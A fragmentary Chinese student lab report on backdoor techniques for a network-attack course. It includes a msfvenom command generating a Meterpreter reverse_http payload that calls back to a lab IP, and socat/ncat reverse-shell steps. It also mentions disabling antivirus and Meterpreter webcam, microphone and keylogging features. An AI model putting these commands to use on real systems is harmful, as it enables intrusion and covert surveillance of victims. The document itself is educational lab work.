标签:定时 inux 选项 cron ack linux lin reverse 输入输出
使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在下载软件时,常常会有其他的一些下载的选项默认下载,这时就有可能使后门进入到我们的系统。
远程监听从而反向连接被控主机,发送后门,控制后门启动
获取摄像头权限进行拍照、录像,获取麦克风权限进行录音以及获取键盘输入
查看开机自启动向、注册表项中有无异常
ncat
Linux中一般自带ncat,可以使用man netcat或man nc可查看其使用说明
Win获得Linux Shell
Linux获得Win Shell
传输数据
socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
Meterpreter
可以使用msfvenom -p windows/meterpreter/reverse_http lhost=172.20.10.2 lport=5217 -f c(IP为Win IP)生成shellcode,注入到可执行文件,执行时回连攻击主机。
在系统时间到第25分钟,就发现获得kali shell
在kali中输入socat - tcp:172.20.10.2:5217(-代表标准的输入输出,第二个流连接到Windows主机的5217端口,IP为windows的IP),接着可以发现已经成功获得一个cmd shell
在Windows中先使用ctrl+c退出上条命令,在执行:20165217_backdoor.exe(注意电脑的防火墙和杀毒软件要关掉),发现kali获得Windows主机的连接,并且得到了远程控制的shell
2018-2019-2 20165217《网络对抗技术》Exp2 后门原理与实践
标签:定时 inux 选项 cron ack linux lin reverse 输入输出
原文地址:https://www.cnblogs.com/yequan1/p/10587748.html